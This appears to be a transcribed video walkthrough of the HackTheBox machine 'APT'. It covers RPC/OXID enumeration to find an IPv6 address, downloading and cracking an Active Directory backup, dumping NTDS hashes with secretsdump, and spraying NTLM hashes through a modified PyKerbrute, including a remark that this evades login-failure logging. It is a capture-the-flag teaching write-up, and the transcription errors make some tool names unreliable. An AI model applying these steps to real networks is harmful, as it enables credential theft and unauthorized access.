What's going on YouTube? This is IPSec. I'm doing APT from HackTheBox, which was an insanely tough machine, but there are a lot of learning opportunities when it comes to like RPC enumeration, remote registry, IPv6, and the potato exploits. Essentially with this box, you use RPC to enumerate the IPv6 address of APT as an unprivileged user. With that IPv6 address, you can bypass the firewall and access SMB to download a backup of Active Directory. You grab a bunch of hashes out of Active Directory, spray it against the domain, and you find that one works, but you don't have any remote access. Use remote registry to pull some registry keys and find that some software put a password in the registry. Use that password to get low priv shell on the box, and then you notice that NetNTLMv1 is enabled, which is a completely crackable hashing format. So you use the potato exploit or Windows Defender to make a SMB request back to your box and get a NetNTLM request that you can then crack to get the administrative user's password. That all being said, a lot of the criticism around the box was there was just a lot of not fun enumeration. For example, finding that IPv6 address, there's no real indication that you have to use IPv6, not on the web server that it's host. And also the firewall is configured to drop all packets. And I think if you just did the firewall to reject packets on like port 445, 338.9, 5985, then nmap would show those ports are filtered, telling you there's a firewall in play. Something like that would be nice. Also, when it comes to the password spraying, it didn't really fit the story, which we'll get into a little bit later, but let's just jump into this box. As always, we're going to begin with the nmap. So sudo nmap-sc for default scripts, sv, enumerate versions, oa, output all formats, put in the nmap directory and call it apt, and then the IP address, which is 10.10.10.213. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open. The first one is HTTP on port 80, and it tells us it's a Windows box running IIS version 10. And then we also have MSRPC on port 135. Nmap does tell us it is Windows, as with this little service info thing along with this IIS. But if we wanted to triple check it, we could just send a ping to this box. So if we ping 10.10.10.213, we do get the TTL of 127. And Windows default TTL is 128. There's one router between us and HackTheBox because of the VPN, which decrements the TTL by 1, hence 127. Generally, if the TTL is below 64, I think it's a Linux box. If it's below 128, I think it's Windows. If it's above 128, then it's probably going to be like a networking device like Cisco or Palo or something like that. So that's generally my rule of thumb with TTLs. Before we go on, let's just record what we did with this nmap. So I'm going to copy this, and then we're going to go over to Obsidian, and we're going to take a note. So 05, enumeration, call it nmap, and then we're going to do triple tick. And I know I've said this a few times. One day I'll learn how to put the nmap flag on this markdown, so when we click preview, it looks even prettier than this. We could switch it over to SQL, which kind of is a bit better, but not by much. If we look at SQL, we can look at that. I think these colors changed to be teal instead of, I don't know what it was before, but yeah. Just always good to record the nmap. So let's go on and I guess start with the web server. So going to 10.10.10.213, we get a page that says gigantic hosting. The very first thing I do is I generally will look at, is this index.html? Since it's a Windows box, I would probably try like ASP and ASPX. We could also try PHP to see if it's a PHP web server, but being IIS, chances are it's not PHP. Even like the Windows PHP things I generally come across, it's using XAMPP or XAMPP, however you say it, which will run Apache on Windows. So it is a HTML page. So I don't know exactly what language is behind this. It does hint at it being a static page. And I'm now just scrolling this web page looking for like user input fields along with like usernames, emails, things like that. So looks like all just lorem ipsum comments. Like this is not a language. Maybe it is. Many desktop publishing, the standard chunk, it was popularized. It's like meme language or something. And then this one, I guess at 4, they just gave up. The wise man. I don't know. But this page doesn't exactly make sense, so I'm not spending too much time on it. And I realize I just went to the same thing multiple times by going to the same page. If we look at our clients, I don't see any client names. Switching over, I don't see too much. Looking at this gallery, we could try to like save this image. And if we save it, this is P10. I would just make sure I didn't have anything sensitive in the downloads directory. Looks fine. And we could move downloads, what was it? Saved as p10.jpg. We can do like exif tool against this to see if there's any like metadata that would say anything. Doesn't look like there is, so I'm not going to look at the metadata of all these pictures. Sometimes there may be like geolocation, they could be a comment, tags, things like that that you come across, but nothing here. So again, we're just trying to figure out where to attack this web page. Going over to the support, we do have a email, so gigantic hosting. So I'm going to go back here and we're going to create OO credentials, or maybe I'm just going to call this accounts. I don't know a good one to call this, but generally the very first note I do is like sensitive things, and I always deem accounts as sensitive. So we have email, and let's do this as a table. So, we'll just do like this. That's funny. It's mailing to demolink.org. So we can do test at gmail.com. And please subscribe to IPsec. And instead of sending it to Burp Suite, I noticed my Foxy proxy is there. I don't have Burp Suite running right now. But when I'm doing things, just testing websites at first glance, I won't always go into Burp Suite because I don't run Burp Suite on my host, because I don't like putting that port swigger SSL cert on my main web browser. So if I was just testing a page at first glance, I just open up these dev tools, and then when I click submit, we can see what it's doing. And if we look at this, we can see it's not going anywhere. The page is still going. My VPN, am I still connected? We can ping 10.10.10 213. Am still connected. Let's see, is there like an edit resend yet? There is. So you can see what things we sent, but it is just a post. And let's see, that is nothing in the body. So we just made a post request and it timed out because it switched to HTTPS. And I'm not even going to bother putting it as HTTP because there's nothing in this body. So this was just a big waste of time. We could look at the source code to this and see what's there. And at the very top, I see this mirrored 10, 13, 38, 16 support.html by something. So this looks like it's just a mirrored page and there's not much information there. So what I'm going to do is hit print screen. This is going to open up my flame shot, and I'm just going to screenshot this, and we're going to put a box around this. Control C to copy. And then we're going to go to Obsidian and create a quick note, 10 web page. And we'll say gigantic hosting, pages cloned. And we press that for pasted image, and that's what we have. And I'm going to say nothing too interesting here. No user input except contact form, which doesn't send data and goes to HTTPS, which is not listening. There we go. And I guess I'm not even going to bother screenshotting this and saving it. We just have a note of this page. So nothing too interesting. I guess we could screenshot this page just so we know what it looks like in the future. And if we wanted to talk about it, we can. Just paste that there. There we go. So let's move on. We should have probably created a folder called APT and then moved all this stuff in there to be organized. So let's see, what do we have else? We can go back to our nmap. So if we go nmap APT, there was a second port. This is this MSRPC thing. And generally, like, probably 99 times out of 100 or 999 times out of 1,000, I just ignore this because like my history with MSRPC, every time I dig into it, there's just too much information. So like if we did sudo msfdb run to start Metasploit, and we try to use like Metasploit scanner for this, I just don't even know where to begin with parsing this information. So let this run. Come on, Metasploit start. Let's do search DCE RPC. Oh my, there's a few. We can use endpoint mapper. So use to set our host to 10.10.10.213, and we run this, and it's going to connect to it and give us way too much information, like information overload. Maybe. So there we go. It ran, and we just have all this information. I don't know where to begin with this. And then there's also some cool things, like you got this event log here. I think LSAS is somewhere. Like it's got a lot of catchy things. But I just, pipe LSAS right here. But I don't know where to begin with this output and what else to do. We could also like look at, let's see, this, I guess we'll do 3. So use 3. We can set our host again. I think I do gset to globally set it. Maybe set -g. So I think that just made it so this our host, if I switch scripts, will stay the same. -g I think is global. But we can run this, and it's going to do pretty much the same thing as the other one did, I think, and just give us way too much info. I haven't actually ran this one yet, so I don't know. But this is kind of why I strayed away from RPC for the longest time. And even after doing this box, the RPC thing doesn't really get us that much information. It's just something that is really cool and used with other exploits like SMB relays and things like that we'll get into. But yeah, nothing. So what we're going to look at is Impacket. So there is an Impacket script, RPCMap.py. And if we do a which, you can see, it's in user local bin, locate RPCMap.py, grep example, because that's where all Impacket scripts live, is within some example directory. So we have RPCMap as part of Impacket. So if we just run this, so rpcmap.py, and then we specify we want to connect to, this is going to be weird. This is like an old interface. We have to do ncacn IP TCP to tell it we want to connect to a TCP IP thing, and 10.10.10.213. If this really confuses you, don't worry, it confuses me as well. So I'm going to copy this, and we're going to go over to Firefox and Google it. And if we go over to this Microsoft document, I think you can see various other things, like we have, I don't like this. Let's see, do we have a different one? If we go into this, yeah. So you have NCAN IP TCP, NB IPX, like NetBIOS IPX, and IPX is just like an old protocol. I remember like this is like my first intro into computers back in like the late 90s, because I remember Blizzard games like I want to say Diablo and StarCraft, maybe Warcraft as well, didn't support TCP IP in the early days. It supported IPX, and Windows 95 or 98, whatever I used at the time, didn't install IPX by default. So you had to install that driver if you wanted to have a LAN party and play with people on a LAN. And understanding how that worked before like Google and search engines was, I guess, tougher than normal, but it's really just right clicking on your network connection and like selecting add IPX. But yeah, that was one of my first introductions to like computers or Windows. So giving you an idea how old this protocol is. So that's why we specify NCAN IP TCP, because that's just what you do. So we just specify this with RPCMap. It's going to connect and give us a bunch of things. We can see like DCOM right here, and unique identifiers to DCOM. So if we wanted to interact with this service directly, we could. And we could also just be lazy and do a brute force with it. So what we want to do is -H to look at help. There we go. So we want to do brute UUIDs, brute opnums, and I want to say we want to do auth level 1, And for the sake of complexity, I'm going to set opnum max to be 5. So we don't spend too much time doing this. And we also have to make all the commands typo free. So operation num, like each one of these RPCs has a total number of operations. And I did opnum like limit 5 because what I'm interested in is only 5. But if I didn't know I was looking for that, I'd probably set it to like 10, 15, or even 100. But we're just going to go through this and look at what is successful. And if you're confused, you can always Google these UIDs to see what they go to. And I like misclicked a bunch of times. But I'm going to let this run and we're going to see if it comes back with anything. And there we go. We have a success right here. We got 2 operation nums from this. And then this one has 3 that succeeded. So while this goes, come on, I can click this. We can copy. We can go back to Microsoft's website most likely. Let's see, this is a Black Hat talk that's probably good, but this is the assignments. So we can see what this is. We can see this is part of the iObject exporter. And if we click on this, we can see what each opnum is. So I'm just going to type success here so we know like it's highlighted. We're looking at this one. So we got opnum 3 and 5, which is success. So 0, resolve oxid, not, well, this is interesting because this is what like potatoes use, or RoguePotato uses an oxid resolver. Simple ping, is that what exceeded? No, we have 3 and 5. Complex, so we can do server alive, and we can do server alive 2. And with server alive 2, it returns strings and security bindings for the object resolver. So this could be interesting. We're going to get into this one in a little bit. I just want to look at the next one, whatever this is. So if we Google this UID, we could go to this Black Hat talk. Is this also on this page? It is not on this page. If I get rid of some of these unique identifiers, is it anywhere? It is not. If we go here, paste this, it is part of RMI maybe. We got is server listening and that, but we had like 5 opnums here. And this is only showing 0 and 2. So let's go this, and we'll say site is equal to this. So site that, and we don't want HTTPS, a little bit of Google dorking. And this UID doesn't go on Microsoft site at all. So I'm going to put that on the back burner. When I don't see like Microsoft documentation for something I'm looking at Microsoft related, I'm just like, you know what, let's just move on. So we could look at this DLL, I guess. And I'm going in uncharted territories here. I didn't even look at this, but it looks like it is part of Microsoft. So Microsoft thing, but there's no documentation on it. This is a Microsoft thing with documentation. So that's why I start with this. So if we Google this UID thing, we know we have some like things, these opnums, but we don't know how to interact with them. And if we look at this, we have the Oxid Resolver Part 1, and we got this big blog post that talks a lot about this on how to interact with them. And then they also give a great Impacket script, which unfortunately is Python 2. However, super easy to port to Python 3, just change the print statements, I hope. So I'm going to VI, what do we want to call this? I'm going to call it ioxidresolver.py, and then we'll copy this again. Tell VI to set mode paste, so set paste, paste it in, and then let's look for prints and convert it to be colons. So this works with Python 3. So we just do target is -t, like this. There we go. All but one print. So let's get this last print. So let's see if this works. Python 3, ioxidresolver -t 10 10 10 213. 47. Bam. Probably just did not copy the last parenthesis. So now we have interesting things. We have IPv6 interfaces. And if we go back to the Microsoft documents, it kind of makes sense why. It says the security bindings for the object resolver, which is probably IP addresses. So we got the host name, IPv4, and IPv6. If we look at IPv6, so sudo vi etc host, and we go here and say APT, and we can do nmap-6. We want to do sudo, and I'm just going to say APT because that's only got an IPv6 interface. We can do -- min rate is equal to 10,000. And this will go like instantly, and we can see a bunch of ports open. So we know we have something here. Now what I'm going to do is I'm going to get this min rate off, and we're just going to do nmap-v. Actually, we'll do -sc-sv for enumerate versions, OA, nmap, IPv6. And while that goes, we can cat ioxid resolver, pipe it over xclip, selection, clipboard, and then we can say new page, IP, or 15-IPv6, and we can say IPv6, getting host name, Python, paste, and then source, link this blog. Okay, so now when we look at this, getting host name, and we have the source of where we got that script from. And if you're confused why I do like skip by 5, and that's if I want to go back and put something between these, I can easily do that. Whenever I number something for like being the sake of ordering, it's just a habit I have. Nmap is still running. This can take a while. And I wanted to show some enumerating the firewall, but I didn't want to do that while Nmap was because it was running. So we're going to take a look at those results in a second. But before I do that, we want to open up Wireshark. And generally what I'll do to enumerate a firewall to see if they screwed up the rules is we can do a netcat. So we can do ncat 10.10.10.213. I'm going to specify port 445. Because this is a Windows box and 135 is listening, I know this port is listening. So we can run this and we look and we just get this IP retransmission thing. So nothing. So next thing I want to do is check a port I don't think is listening. So I'm going to do 24324. And we're going to see if it behaves differently. And it does not. So there's no real way to enumerate this firewall because what it's doing for unknown things is the same it's doing for known things. Every now and then, especially on Linux, you'll come across something where if they block the service like explicitly, they'll send you a reject instead of just dropping the packet, which this is doing. And when you see the reject on like port 445 and a drop packet on everything else, you know 445 may be listening and you got blocked. But because both of here are responding the same, there's nothing you can really do. So with all that being said, let's get into the IPv6 nmap. So let's look at nmap/apt, or we'll look at IPv6.nmap. I guess I should label that like apt-IPv6. But we can see it's got 53, simple DNS plus, we got IIS, we got 88 KerBrute. So I'm thinking after 389, this is going to be an Active Directory server because we got like DNS, KerBrute, and LDAP, probably secure LDAP, yep, right here. So we know this is AD. Also has hdb.local, so we know the domain name. We got some time stuff with these not valid before or after the clock, and SMB stuff, message signing. So a lot of good information in this. So I'm going to cat this, xclip, selection, clipboard, And we're going to go back here and say enumeration. And I'm going to go back into my edit mode and say IPv4. And then we'll do IPv6. And we can also link details on getting IPv6 name 15-IPv6. I think that's how I do it. No, that is not how. Bam. I think I need 2 brackets. That's why I screwed up. There we go. So now we got that. And also, if you went into this open graph view, you can see enumerations now linked to IPv6. If you're like looking for notes. A little bit helpful, not too much, but just a cool thing this application does. And if you like have watched my videos a lot, you'll know in Sneaky, I do a lot of like IPv6 multicast things to discover addresses. It's actually not applicable here because Windows does not respond to the multicast by default. So if you tried to do like logged into a box on the HackTheBox network and did like a ping 6 -I your address, like dead beef, something, whatever your IPv6 address is, IPADDR. So if you did like ping 6 -I this FF02.1, I think would do a broadcast, it won't actually work because Windows doesn't respond to broadcast things. Also in Sneaky, I say that Windows would work if you send it a invalid an invalid ICMP packet, and that doesn't work as well because Microsoft fixed that. What used to happen a few years ago, you just sent a broadcast packet out that had a bad checksum in it, and then the Windows box would get this broadcast packet and go back to you like, hey, I normally don't respond to these, but you made a mistake. But Microsoft fixed that. Curiously, like oddly enough, I think NetBSD is still one of the only operating systems that responds to bad broadcast packets. So no good way to enumerate IPv6 without just like doing a nmap against the v6 address space, which would take forever. So that's out of the question. This Oxid Resolver stuff is pretty much the only way. So what we can do now with this IPv6 stuff is we can try doing it in like SMB client, I guess, to access the SMB share. So if we do SMB client / APT let's see, -L we need. So -L is list. And we go to, there is this backup directory. So if we try to use backup, so if we do SMB client / APT backup, hit enter, we get anonymous login successful. And we can download backup.zip. I was really, get backup.zip is download. I was actually not expecting that to work. I thought we'd have to specify the -N for null authentication, but it doesn't look like we do. We just log in, and what I was doing for the password there was just blank. So it looked like it did an anonymous login when I don't specify a password. So we have this backup.zip. I'm gonna unzip it. So unzip backup.zip, and it requires a password. So that's unfortunate for us. I think there's like zip to John. There is. So we can do zip to John, Active Directory. No, we just want backup. There we go. And we get this. So we can say v backup.zip.hash maybe. I don't know what to call this, but we just paste that there. And now we can do John -- word list is equal to user share word list rocku.txt. Is that it? ls, that is a file. And we can say backup.zip.hash. And normally I'd be going back to my Kraken, but I haven't bothered fixing that since I moved. And holy cow, that cracked almost instantly. We can see the password is I love you so much. So let's do unzip, backup.zip, paste this, and we have our backup. I'm going to make dir backup, and we're going to move the two files that it created, Active Directory and Registry, inside of a directory called backup. So we go into backup, and we got these. So we can do find, type F, and what do we have? Maybe General File Management? I don't know what JFM stands for. We don't need to use this. Nah, it's piqued my curiosity. File, we put this in quotes because it has a space in it. It's just data. Probably JFM, like probably something with journal. Let's see. Extension JFM. Let's see, JFM. What are you? It just keeps saying JFM. Don't know. We don't need this file. What if I XXD it? I know I keep saying let's move on, but I'm interested. There's not much information in it. Yeah, so there's not really anything in this file. So what we probably should have done, so if we go back SMB client, we can copy this and go back to our notes, 20, NTDS backup. There we go. So just we have notes and where's John? Can show that as well. There we go. So again, always take notes as you go. It comes in super handy. What is that find command? Find, there we go. So we can do SecretsDump. This is another Impacket script. So SecretsDump, I think -NTDS, NTDS.DIT, and then security, registry. You know what? Let's move Active Directory here, move registry here, so we don't have to specify these stupid directories. I really hate, oh wait, it's got autocomplete saved me there by escaping that space. But this is how I like it. So we can do SecretsDump.py-h, and we can see some things. I really like having this password last set, this user status, and history flag. So password last set is going to tell us what day the password was set. I just like having that information. It's really handy if like you come across a domain where they have a user account, a datum account, like there's multiple levels for the same person and you see them setting the password within 1 hour, chances are those are the same passwords because they change it on one and then change it on all accounts. The user status is going to tell us if the account is disabled or not, just good information to have. And then the history, this is a really cool thing because by default, Windows, I think, remembers the last 24 passwords. So you can't like reuse a password that you've used before. In order to do that, it has to store the password. So this history flag is going to dump the history for every user. So if they change the password 24 times, you get 24 passwords for them. So you get the previous password too. Really comes in handy with password sprays. So we're going to do SecretsDump.py, pwd last set, user status, history, and then I think we can specify like -NTDS, SAM, and security. So -NTDS is going to be NTDS.DIT, -security, this is going to be security, and -system. Okay, and if you don't know, target, I think we just do local. There we go. So while that works, if you don't know what these files are, NTDS.DIT is the Active Directory like database. Security, I think this is where the encryption, like a key used to decrypt NTDS.DIT, but that key is obfuscated by the boot key, which exists in the system. So NTDS is the database. I think it's encrypted by key and security, and that key and security is itself encrypted by a key and system. And this is just registry, Hives, and Windows. So yeah, we are dumping a lot of data. So I'm going to Control-C this actually, and we're going to tee this file off into a different one. I'm going to call this SecretsDump.backup. There we go. Because that was like information overload. The default password for, I think, like this is the recovery key for Active Directory, password 123 bang. We get some deep happy stuff, which is good, but yeah. Let's just let this go. It's gonna take a while probably. So that didn't take as long as I expected it to. I'm going to grab this and we're just going to, I'll put it here. Dumping NTDS. I need to put this on a new line. There we go. So we got a lot of information here. If we cat secretsdump.backup, generally how I parse through this is I just do grep-vs, and we can grep-v AES and say 1 or 2, and -v is going to say exclude. And we can also say ds.cbc. And the reason why is I like seeing these AADs to see if there's any landman hashes. I think for this to be shown, Windows would have to have that checkbox in the user to say store password and reversible encryption. But it looks like everything's going to have AAD, which is the blank landman, so it's disabled. So if you only wanted to see NTLMs, you can just grab this blank one and grep it on the backup file. So we can also grep for history, and then grep-v history 0, and the APT domain key. So this is like the host name of the machine, what you can use to do pass the hashes, has rotated 3 times. Because, wait, what? It didn't start at history 0. Because I hid 0. So you got the password, so that'd be the first one, history 0, which is the second, the first, so third, fourth. So the domain key for this box has been rotated 4 times. But no users have been rotated more than once. Interesting enough, like every user has had a password and then they changed the password. So I'm not exactly sure what that is about. If we look at SecretsDump and look at these password last sets, we can see they're all set at like the same time, 1837. Like same time everywhere. Maybe some are going to be 36 if it took a while for the script to run. But you can see something, yeah, 1836 and 18, did I see? I thought I saw 36, but you can see everything set around the same time. So what I'm also going to do is we're going to try grep-v 18.3 and 6.7. And we want to get rid of history 0. We got 5 as well. So I'm just looking for like an account that was set oddly. KerBrute, not there. I was saying this hash has been changed 5 times, I think. This is a local, like the domain controller itself's hash. It's not the Active Directory domain hash, which is KerBrute. So this is, you could still DC sync to this domain with this hash if it was still valid. Hopefully that makes sense. We got the administrator. He was set on 1253. So he wasn't included in all of this. But yeah. We also have status is equal to enabled. We could also see if there's any disabled accounts. So if we grep status and then grep-v enabled, there's only 2 accounts that is disabled. KerBrute, which is always disabled because it's not really an account. It's just a signing key. And then default account is disabled. So nothing interesting there. So we just have a list of accounts. And what we guess we can do is see if these accounts are valid on the domain itself. And we can use a tool called KerBrute to do that. So in order to do that, we just have to grab a list of all accounts. So I'm going to go again, grep AAD3B, and then we're going to do a awk-f on colon, a field separator, a delimiter, whatever it is. I'm going to say grab the very first instance. So now we just have usernames. I'm going to grep-v history because we don't want that. Pipe it over to sort-u. So we have only uniques. And we can say users.list. So now we just have a list of usernames. And we can find out which ones are valid by using a tool called KerBrute. So if we just go to Google, go to KerBrute, this will do a Kerberos pre-authentication check to see if users are valid. You can also do password sprays with it, which is super handy. Because, well, it will still lock out users. It doesn't create the traditional event code of 4625. Instead, it creates another one that isn't logged by default. So it's a pretty good way to like do log evasion with password spraying. If you don't have this tool, you can just download it on the releases. But if you do, like I do, I just have it installed in opt-KerBrute. So we go opt-KerBrute, KerBrute-H for options. We probably want to do user enum. So we do that with -H and then pass what flags we want. So we can do --DC, and that is going to be APT. And then the domain, which I think SecretsDump said htb.local, but we can probably figure this out. I'm pretty sure I said it before. Do I have it in my notes? Is anything here? IPv6. Oh, the nmap will probably say. So if we go to enumeration, we do have the domain right here, htb.local. So that's why it helps taking these notes. So nmap has told us the domain is htb.local. So DC is APT. This is in my Etsy host file as the IPv6 address. -D for domain, we're going to say apt.local, and then users.list. I didn't specify user enum. I said it, did not specify it. And how many users are there? So if we cat users.list, ooh, wrong realm. That's not good. Oh, htb.local. There we go. Well, now you know what will happen if you specify the wrong domain in KerBrute. At least I assume this won't error now. So we're in backup, and we found a valid username administrator. So if we want to grab hashes, we can now just like grep administrator from what's the file name? We called it SecretsDump.backup. So we got this password hash. The password was last set 2020 September 22nd. So what if we try logging in with this password? I'm going to go into CrackMapExec and poetry run CME and then SMB APT. Let's see if we can connect to it. And it doesn't look like we can. I think this is probably because of IPv6. CrackMapExec may not support it. So what I'm going to do is listen on 445 on my local host and direct it out to IPv6. So sudo socat TCP listen 445 and fork. So every connection just forks and we can go move on with our life. If we don't have that fork, then it's going to create like a blocking network connection. If multiple things try to connect to it, it won't work until the previous connection stops. So fork is always good when you do listen with Socat. TCP, APT, and again, this is getting crazy with my Windows, but if I ping APT, it's going to that deadbeef IPv6 address. So 445. So now when I do this poetry run CrackMapExec, and I'll specify instead of APT, we'll do localhost, and see if it connects. It does. Awesome. Wonder if we can do like --passpol for password policy. See if that is enumeratable with anonymous. Doesn't look like it is. So we can do -u administrator -H for hash and grab this administrator's hash. So if we grab this right here, copy, paste. We can see if we can log in with administrator, which we can't. So now we're going in and just waiting for this to finish. And if we look, let's see, right here. This one is in HTTP backup. If we cat users.list wc-l, we're trying 2,000 different users. So this may take a little bit. So I'm just going to pause the video and we'll resume when this command finishes. KerBrute has finished. It took around 17 minutes to run, but after 7 minutes, we got the account of Henry.Vinson. We also have the machine account of APT. And if you remember from like zero login attacks, if we have this machine account hash, we should be able to DC sync. So that's the next thing we're going to try. So let's go back up to a poetry command. And I'm actually not sure if CrackMapExec can test machine accounts, but we're going to try it anyways. So APT, and then we'll do the hash of that account. So if we grep probably APT on this, let's see, we can get this hash. So let's grab this, copy, paste, and see if we get a success here. We get login failure. So let's go to the next one of Henry.Vinson. So let's grep for Henry, and his hash is this, 2D. So copy, and then username Henry.Vinson, and then the hash, paste that in. And we get login failure. We could also try his old password, but that wouldn't really make sense coming out of the backup. We can also maybe grep for Vinson on SecretsDump.backup, and we can see he has, Wyman. I don't even know what that is. Sometimes things don't make sense when you look at them, especially when it comes to companies. Maybe, I guess we can try this hash. So if we search for this hash, and we'll see what happens. Because it had Vincent in the name, so maybe it's the same person and he has a password reuse scenario going on. We can try the hash. And will it work? No. So we could spray all these hashes, and that's what we're going to do. We're going to take every single hash in the secrets dump and spray it against this guy's account. Doesn't make much sense. I think it should have been like an ADM account or something like that. But what they're trying to show is every now and then organizations have like, I think it's whale to ban, like it blocks SMB brute forcing. And if we sprayed with CrackMapExec, we'd run into that issue because after a few failed attempts, it's going to block us. It's essentially like fail to ban, but for SMB. So what we have to do is use a KerBrute login. Now, the issue with this is KerBrute right now does not support it. It will probably be around the time this video is posted. And if he pushes this branch before it's posted, then I'll try to edit the video and add in a piece at the end going into this. But yeah, the commit feature request is here for that. And right now, KerBrute just doesn't have a way to authenticate via NTLM hashes. But this application does. It's called PyKerbrute. And it's just a janky solution because mainly it's Python 2. And it just isn't a typical project. It just screams like this is a researcher's project with just how it's organized. So I'm going to go into my HTTP directory APT. I'm going to git clone this project, PyKerbrute. We can take a look at how it works. So if we look at AD password spray, we can see it's importing a bunch of stuff. I think this is from Impact, maybe this isn't from Impacket, but all the libraries are contained. So it's got this _crypto that has things. It's got PyASN1 that has things. So it should work. RC4 HMAC is E-type 23. So they just have that coded right there. So let's see. And if you didn't know, this is like NTLM. When you see RC4-HMAC, that's an NTLM. And NTLM is just a MD4 sum. That is UTF-16 bit little endian encoded. So if you wonder why NTLM cracks so fast, it's because it's not even MD5, which is still a super fast algorithm. So if we look at this, how it's used, we got arguments, and it's doing some things. If arg4 is clear password. And this is like what I mean about it being a little bit janky. If I was making this, I'd probably use argparse. So you don't have to do everything based upon where it exists in argv. But that being said, this is a great program because I couldn't find a better way to do this. So whenever you do these like weird one case scenarios that aren't really too common, janky solutions are probably going to be what you find. So if we look at how it works, it does a password spray TCP on these arguments, and it's doing line strip RN. So I'm going to take that password spray function, and I'm just going to move it up. So if we go here, I think if I just do like D, I can delete everything. Boom, I can. Awesome. So it looks like 4 spaces. And we just want to hard code a bunch of things. So the first one is user realm, and that is going to be the domain name, so htb.local. And then we have this, which is the password. So we'll get to that in a little bit. We want to do user key. So user underscore, oh wait, no, this is the username. User key is the password. So we can do username is equal to Henry.Vinson, and we're going to put that here. So Henry.Vinson, and then user key we'll get rid of because that is password, or NTLM hash, I should say. KDCA, this is going to be the host name of the machine, which is APT, and then the very last thing. Wait, what is password spray TCP? Maybe that is the password. If we look at this, password spray, how's it using the thing? So user key. I wonder if this is going to be the encryption type. Realm name key. Let's just go to this build AS request function to see exactly how this key is used. So if we look at key, it is being used in this PA timestamp probably. Yeah, encrypted timestamp. How is encrypted timestamp used? This key. Key 0 E-type. So that's the encryption type. So this is multiple things. Encryption type and then key. Maybe the easier way to go about this is just to look at the code and see how it uses or how it builds this user key. So if we go here and then search for, what was it? User-key, user_key. Oh, come on. Where's the build TCP? Check user. Oh, I'm in enum. I want password spray. There we go. That's why it wasn't making much sense to me. So if we look, password spray TCP, user key. So we can search for that. Go up to see where it's used. So user key, E-type RC4-HMAC. That is what, E-type 23, I think we said earlier. And then the decoded value of hex. So now we kind of understand how that's played. So let's go back to our password spray. And we're going to say with open hashes.text read as f. Then we'll say hashes is equal to f dot read lines. Print hashes. Let's just see if that works. Python 2 versus 3. This is Python 2. So we'll do print space. I feel so dirty for using that. Let's see, Python 2, 80, pwd spray, and I feel so dirty, I typed it out of habit. Hashes.txt. So test hash. Okay, so we probably need to remove \r/n, maybe. So v80 password spray hashes this. So for hash and hashes, ooh, H. I said ooh because that like went into teal color, which means this may be used in Python. So that's why I just say H. And then say H is equal to H.strip \r/n. And say NTLM. Bam. That's easily readable. And now if we print NTLM, you can see how much I want to put those parentheses on. H is not defined because we changed it. So NTLM, there we go. So now if we had a list of NTLMs, that works. So for this password spray, we can make user key now. So user key, so user_key is equal to rc4_hmac. And then we can say ntlm.decode hex. And that code, very similar to this, right? sysarg5 is just NTLM in our case. And they're putting that argument here. They're stripping this \r/n. We already did that. So that's why we don't have that. And then we just need the last piece, which is going to be password. So if we space, put a bunch of spaces. Let's see, this can be, let's move NTLM like that. There we go. This is user key. And then this is NTLM. I think. We're about to find out if this works. I wouldn't be surprised if it doesn't. Like, whenever your code works for the very first time, that's when you have like things to be worried about. Let's see, we want to grep for awk. And let's see, we need to create hashes.txt. And I'm going to guess it's the fourth parameter. Let's cat hashes.txt. Oh man, I'm good. If we look at that SecretsDump file, let's go to AAD, where an NTLM is. So we got username, then UID, and landman hash, then NTLM hash. So I field separated on colons, and 1, 2, 3, 4. So now we got hashes. So cp hashes.txt, and we'll copy it to HTTP APT PyKerbrute. Python 2, 80 password spray. What error message are you going to display? Henry is not defined. Henry.Vinson needs to be in quotes. And service not known. Socket. So I'm guessing this is going to be a IPv6 thing. So if we look at socket, we're using socket. It's using AF-INET, and we want AF-INET6. So %s AF_INET AF-INET6. Replaced it in, I think, just 2 instances. I thought it was going to say down there, but I don't see how many times it replaced it. INET, yeah, just 2. It may have said it over on this right side, which I wasn't looking at, but now let's try it again. Password spray, is it gonna work? Well, this can take some time. I'm gonna pause the video and we'll probably resume. Let's say KerBrute took 17 minutes. This is in Python, not Go. I'm gonna guess it can take 20 minutes, but we'll see. So after quite a few minutes, the script aired out. I'm hoping this just aired out on a successful password, but I tested this against a Active Directory setup I just have at home, and the script works. So I think KerBrute just decided to tell us no, and then the script just pieced out because we don't have any error handling. So what I'm going to do is add a little bit of error handling. So if something does go bad, it can just like fail, let us know, and continue. Because what happened was KerBrute said no, and then the script died, and we don't even know where it left off. So what I'm going to do is put a try, and then we're going to indent this. And then we'll say accept exception as error. And then I want to print a few things. I'm resisting the urge not to do a parenthesis, but we want to print, let's see, NTLM plus, actually we'll do two print statements, NTLM and then str error. And I don't know if this is going to work. We may just want error, but I know in Python 3 we always want to do string error because I'm trying to think how error is handled. Python 3, everything's kind of like a byte. So if error is a byte, that's why I'm doing string, but it's Python 2, it's not like that. However, if I do string against a string, I think it works anyways. So this is one of those my code is bad, but please don't judge me moments. So we're gonna run this password spray again and just see what happens. The script finished, but it didn't finish in a way I expected it to. It took 17 minutes. If you're watching the time in my top right, I just had things come up while this was running and came back to it when I could, but 17 minutes after it actually finished. So it's about the same speed as the Go program. That being said, it just displayed the hash and a failure, which I don't understand because what I did was I created this hash.old thing. So let's go h.old here, and we're going to put a few hashes. So one's going to be valid. So we have this one as that. There we go. So that middle one was the valid hash, right? I'm going to edit this program, the AD password spray, and it's going to just work successfully and not hit this error. So h.old, we replace the text. And watch, the demo god's going to have me, and it's going to error again. Python 2, there we go, valid login. Like, all I edited was this h.old file. I'm not exactly sure what went on there. Maybe there's, like, a different line break between the two of these, but I don't think that's the case. Let's do xxd, or head-3, hashes xxd. Let's see, this one begins with 0a. So this is using 0a for line breaks, and this is using 0a for line breaks. So the line break between hashes is the same. I really can't explain it, but thankfully I had the hindsight to put this hash in the exception. And that's one of the things that I guess just comes from experience. Like whenever you're doing error handling, even if it doesn't make sense, you're like, you know what? Let's see exactly where in my program this errored or where in this word listed errored. So we got that hash. Let's test out to see if it's valid. So I'm going to go back to my CrackMapExec, and we're going to do poetry run, Henry.Vinson, and this hash. And the PyKerbrute did tell us it was valid, so this should definitely work. But we don't see pwned, so we can't use this SMB to really do anything. We could look at the shares to see if Henry.Vinson has any extra access. We can also do WinRM to see if he has WinRM access. Maybe? I'm not sure why that didn't work. We could just do Evil-WINRM -I APT -U Henry.Vinson-H for hash. I think H is hash. Dash capital H for hash. And see if it connects with WinRM. I'm not sure if like my Socat forward is, oh, that is why. If we change Socat forward to be 5985, it'll probably work. That is why it just did that. Well, it won't work in the sense that I know this user doesn't have access, but CrackMapExec will hopefully display something. There we go. So now we get that access denied, which is what I was expecting. So now what we have is just this user. I guess we can try SMB 